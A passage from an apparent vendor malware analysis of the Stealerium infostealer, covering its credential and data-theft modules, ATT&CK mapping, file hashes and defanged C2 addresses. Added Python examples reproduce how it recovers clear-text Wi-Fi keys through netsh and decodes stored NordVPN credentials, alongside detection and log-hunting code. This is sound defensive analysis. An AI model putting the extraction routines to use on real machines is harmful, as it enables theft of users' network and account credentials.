    Each class likely implements routines to extract user data, game configurations, or sensitive files for exfiltration.

    Fig 23: Checks for a Minecraft installation

    It checks for a Minecraft installation and creates a save directory into which it copies the data to be exfiltrated, such as mods, files, versions, logs and screenshots. Logs and screenshots are captured only when the Config.GrabberModule setting enables them.

    Messenger Data Stealer Modules

    It targets the following communication platforms to extract user data or credentials:

    • Discord
    • Element
    • ICQ
    • Outlook
    • Pidgin
    • Signal
    • Skype
    • Telegram
    • Tox

    Below is one example, Outlook credential harvesting.

    It reads specific registry keys associated with Outlook profiles to extract sensitive information such as email addresses, server names, usernames and passwords. It gathers these values for multiple mail protocols (SMTP, POP3, IMAP) and writes the collected information to a file (Outlook.txt).

    Fig 24: Messenger Data Extraction

    Webcam Screenshot Capture

    It attempts to take a snapshot with a connected webcam and saves the image as a JPEG file. If only one camera is connected, it sends a series of messages to capture a frame, which is then saved to the specified path (camera.jpg or a timestamped filename). The routine is gated by a configuration setting (Config.WebcamScreenshot).

    Fig 25: Webcam Screenshot Capture

     

    Wi-Fi Password Retrieval

    It retrieves the Wi-Fi password for a given network profile by running netsh wlan show profile and extracting the password from the output. The output is filtered with findstr Key to keep only the line that holds the key; that line is then split on the colon and trimmed to obtain the value.

    Fig 26: Wi-Fi Password Retrieval
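The following Python is an added example for this write-up, not Stealerium's own code: it mirrors the findstr Key / split / trim logic described above against a constructed netsh output, and pairs it with the process-creation check a SOC would run to catch it. The netsh output, the event records and the key value are constructed; the assumption that the stealer passes key=clear (the only switch that makes netsh print a "Key Content" line) is labelled in the code, and revolaomt.exe is the dropped binary from the IoC table below.

```python
# Added example for this write-up (not Stealerium's code): how the netsh-based
# Wi-Fi key grab works, and a process-creation rule that catches it.
# The netsh output and the event records below are constructed samples.
import re
from typing import List, Optional, Tuple

# Constructed: abbreviated output of
#   netsh wlan show profile name="Office" key=clear
# Assumption: the stealer passes key=clear, because the "Key Content" line
# only appears with that switch.
SAMPLE_NETSH_OUTPUT = """\
Profile Office on interface Wi-Fi:
=======================================================================

Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : CorpWifi2024!

Cost settings
-------------
    Cost                   : Unrestricted
"""


def extract_key(netsh_output: str) -> Optional[str]:
    """Mirror the stealer's `findstr Key` + split + trim logic.

    findstr is case-sensitive, so "Security key : Present" does not match;
    only the "Key Content" line (printed with key=clear) survives the filter.
    Returns None when no key line is present (no stored key, or key=clear
    was not given).
    """
    key_lines = [line for line in netsh_output.splitlines() if "Key" in line]
    if not key_lines:
        return None
    return key_lines[0].split(":", 1)[1].strip()


# Constructed process-creation events (Sysmon Event ID 1 style, abridged).
# revolaomt.exe is the dropped stealer binary from the IoC table.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": 'netsh wlan show profile name="Office" key=clear',
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\revolaomt.exe"},
    {"Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh wlan show interfaces",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": "findstr Key",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\revolaomt.exe"},
]

# "show profile ... key=clear" is the only netsh form that prints the
# clear-text key; "show interfaces"/"show profiles" on their own are noise.
WIFI_KEY_DUMP = re.compile(r"netsh\s+wlan\s+show\s+profile\b.*\bkey\s*=\s*clear", re.I)


def flag_wifi_key_dump(events: List[dict]) -> List[Tuple[str, str]]:
    """Return (parent image, command line) for every clear-text key request.

    The parent is kept because an admin typing this in cmd.exe looks the same
    on the command line; a parent living in %TEMP% or %LOCALAPPDATA% is what
    turns it into a stealer indicator.
    """
    return [
        (ev.get("ParentImage", ""), ev["CommandLine"])
        for ev in events
        if WIFI_KEY_DUMP.search(ev.get("CommandLine", ""))
    ]


if __name__ == "__main__":
    print("recovered key:", extract_key(SAMPLE_NETSH_OUTPUT))
    for parent, cmd in flag_wifi_key_dump(SAMPLE_EVENTS):
        print("ALERT wifi key dump:", cmd, "parent =", parent)
```

The detection deliberately matches on the command line rather than on findstr, because the stealer can read netsh output from a pipe without ever spawning findstr.exe; the command line with key=clear is the part it cannot avoid.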

     

    VPN Data Extraction

    It targets several VPN clients to exfiltrate sensitive information such as login credentials:

    • NordVpn
    • OpenVpn
    • ProtonVpn

    For example, it extracts NordVPN credentials from the user.config file found in the NordVPN installation directories. It looks for the "Username" and "Password" settings, decodes their values, and writes them to a file (accounts.txt) in the specified savePath.

    Fig 27: VPN Data Extraction
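As an added example for this write-up (not the sample's code), the Python below reconstructs what the NordVPN module recovers from user.config, to make the point that the stored account settings are only encoded, not protected: anyone who can read the file can read the account. The XML is constructed in the standard .NET userSettings layout. Two things are assumptions, since the analysis above only says the stealer "decodes" the values: that the encoding is Base64, and that the section is named NordVpn.Properties.Settings (the parser does not depend on the section name).

```python
# Added example for this write-up (not the sample's code): reconstruct what
# the NordVPN module recovers from user.config.
# Assumptions: the values are Base64 (the write-up only says "decodes") and
# the section is called NordVpn.Properties.Settings; the parser walks every
# <setting> element, so it does not rely on that name.
import base64
import xml.etree.ElementTree as ET
from typing import Dict, Optional


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed user.config in the .NET userSettings layout; the account values
# are made-up test data.
SAMPLE_USER_CONFIG = f"""<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <userSettings>
    <NordVpn.Properties.Settings>
      <setting name="Username" serializeAs="String">
        <value>{_b64('alice@example.com')}</value>
      </setting>
      <setting name="Password" serializeAs="String">
        <value>{_b64('s3cret-vpn')}</value>
      </setting>
      <setting name="AutoConnect" serializeAs="String">
        <value>True</value>
      </setting>
    </NordVpn.Properties.Settings>
  </userSettings>
</configuration>
"""


def extract_nordvpn_credentials(xml_text: str) -> Dict[str, Optional[str]]:
    """Return the decoded Username/Password settings from a user.config.

    Walks every <setting> regardless of section name, so it tolerates the
    section being named differently between client versions. A missing,
    empty or undecodable value yields None instead of raising, because a
    stealer (and an analyst replaying it) has to survive partially written
    configs.
    """
    found: Dict[str, Optional[str]] = {"Username": None, "Password": None}
    root = ET.fromstring(xml_text)
    for setting in root.iter("setting"):
        name = setting.get("name")
        if name not in found:
            continue
        raw = (setting.findtext("value") or "").strip()
        if not raw:
            continue
        try:
            found[name] = base64.b64decode(raw, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            found[name] = None      # not Base64 / not text: leave as unknown
    return found


if __name__ == "__main__":
    print(extract_nordvpn_credentials(SAMPLE_USER_CONFIG))
```

Base64 with validate=True rejects anything that is not strict Base64, which is what distinguishes a plainly encoded credential from a value the client has actually protected (for example with DPAPI); the latter would surface as None here rather than as garbage.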

     

    Porn Detection & Screenshot Capture

    Fig 28: Porn Detection & Screenshot Capture

    It detects adult content by checking whether the active window's title contains NSFW-related keywords (configured in Config.PornServices). If a match is found, it triggers a screenshot capture.

    Conclusion:

    Based on our recent proactive threat analysis, we have identified that cybercriminals are actively targeting U.S. citizens around the April 15 tax-filing deadline. These threat actors are using the occasion to deploy Stealerium malware, relying on deceptive lures to trick users into running it.

    Stealerium is designed to steal personally identifiable information (PII) and credentials from infected devices and transmit them to attacker-controlled bots for further exploitation.

    To safeguard your data and devices, we strongly recommend using Seqrite Endpoint Security, which provides advanced protection against such evolving threats.

    Stay secure. Stay protected with Seqrite.

    TTPs

    Tactic              Technique ID   Name
    Initial Access      T1566.001      Phishing: Spearphishing Attachment
    Execution           T1059.001      Command and Scripting Interpreter: PowerShell
    Defense Evasion     T1140          Deobfuscate/Decode Files or Information
                        T1027          Obfuscated Files or Information
                        T1497          Virtualization/Sandbox Evasion
                        T1497.001      Virtualization/Sandbox Evasion: System Checks
    Credential Access   T1555.003      Credentials from Password Stores: Credentials from Web Browsers
                        T1539          Steal Web Session Cookie
    Discovery           T1217          Browser Information Discovery
                        T1016.002      System Network Configuration Discovery: Wi-Fi Discovery
    Collection          T1113          Screen Capture
    Exfiltration        T1567.004      Exfiltration Over Web Service: Exfiltration Over Webhook

    Seqrite Protections:

    • HEUR:Trojan.Win32.PH
    • Trojan.49490.GC
    • trojan.49489.GC

    IoCs:

    File Name                                  SHA-256
    Setup.exe / revolaomt.exe                  6a9889fee93128a9cdcb93d35a2fec9c6127905d14c0ceed14f5f1c4f58542b8
    104842599782-4.pdf.lnk                     48328ce3a4b2c2413acb87a4d1f8c3b7238db826f313a25173ad5ad34632d9d7
    payload_1.ps1 / fgrsdt_rev_hx4_ln_x.txt    10f217c72f62aed40957c438b865f0bcebc7e42a5e947051edee1649adf0cbf2
    revolaomt.rar                              31705d906058e7324027e65ce7f4f7a30bcf6c30571aa3f020e91678a22a835a
    104842599782-4.html                        ff5e3e3bf67d292c73491fab0d94533a712c2935bb4a9135546ca4a416ba8ca1

    C2:

    • hxxp[:]//91[.]211[.]249[.]142:7816/
    • hxxp[:]//185[.]237[.]165[.]230/
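The Python below is an added example for this write-up, not part of the original analysis: it refangs the C2 indicators listed above and matches them against proxy log lines, treating the registration URI from the RegisterBot section as a second, weaker signal. The log lines and client addresses are constructed; the indicators, the port and the /api/bot/v1/register path are the ones reported in this post.

```python
# Added example for this write-up: refang the reported C2 indicators and hunt
# for them in proxy logs. Log lines are constructed; the indicators and the
# registration path come from the analysis above.
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

DEFANGED_C2 = [
    "hxxp[:]//91[.]211[.]249[.]142:7816/",
    "hxxp://91.211.249.142:7816\u2033",     # stray quote as copied from the post
    "hxxp[:]//185[.]237[.]165[.]230/",
]
REGISTER_PATH = "/api/bot/v1/register"       # path of RegisterBot's RequestUri


def refang(ioc: str) -> str:
    """Undo the common defanging conventions so the indicator can be matched."""
    ioc = ioc.strip().strip('"\u2033\u201c\u201d')
    return (ioc.replace("hxxps", "https").replace("hxxp", "http")
               .replace("[:]", ":").replace("[.]", "."))


def c2_addresses(iocs: List[str]) -> Dict[str, Set[int]]:
    """Map each C2 host to the set of ports reported for it (0 = no port given)."""
    hosts: Dict[str, Set[int]] = {}
    for ioc in iocs:
        u = urlsplit(refang(ioc))
        if u.hostname:
            hosts.setdefault(u.hostname, set()).add(u.port or 0)
    return hosts


# Constructed proxy log: timestamp, client, method, URL, status.
SAMPLE_PROXY_LOG = [
    "2025-04-12T09:14:02Z 10.0.0.23 POST http://91.211.249.142:7816/api/bot/v1/register 200",
    "2025-04-12T09:14:09Z 10.0.0.23 GET  http://185.237.165.230/ 200",
    "2025-04-12T09:15:11Z 10.0.0.44 GET  https://www.example.com/ 200",
    "2025-04-12T09:16:30Z 10.0.0.51 POST https://cdn.example.net/api/bot/v1/register 404",
    "garbage line",
]


def hunt(log_lines: List[str], iocs: List[str] = DEFANGED_C2) -> List[Tuple[str, str, str]]:
    """Return (client, host, reason) for each line touching a C2 or the register URI.

    Host matches are port-agnostic on purpose: the operator can move the
    service to another port more easily than to another address.
    """
    known = c2_addresses(iocs)
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 5:
            continue                                 # tolerate malformed lines
        client, url = fields[1], fields[3]
        u = urlsplit(url)
        reasons = []
        if u.hostname in known:
            reasons.append("known C2 address")
        if u.path == REGISTER_PATH:
            reasons.append("bot registration URI")   # weaker on its own
        if reasons:
            hits.append((client, u.hostname or "", "; ".join(reasons)))
    return hits


if __name__ == "__main__":
    for client, host, reason in hunt(SAMPLE_PROXY_LOG):
        print(f"{client} -> {host}: {reason}")
```

A hit on the registration path alone (the cdn.example.net line in the sample) is worth a look but not an alert on its own, since the path is generic; a hit on one of the reported addresses is.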

     

    Authors:

    Dixit Panchal
    Kartik Jivani
    Soumen Burma